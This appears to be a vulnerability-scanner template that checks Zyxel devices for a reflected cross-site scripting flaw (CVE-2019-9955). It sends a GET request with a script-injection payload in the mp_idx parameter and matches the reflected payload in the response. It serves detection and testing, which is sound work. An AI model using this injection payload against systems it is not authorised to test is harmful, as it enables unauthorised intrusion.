id: CVE-2019-9955

info:
  name: CVE-2019-9955 Zyxel XSS
  author: pd-team
  severity: low

requests:
  - method: GET
    path:
      - "{{BaseURL}}/?mobile=1&mp_idx=%22;alert(%271%27);//"
    matchers:
      - type: word
        part: body
        words:
          - "\";alert('1');//"
          - "<title>Welcome</title>"
        condition: and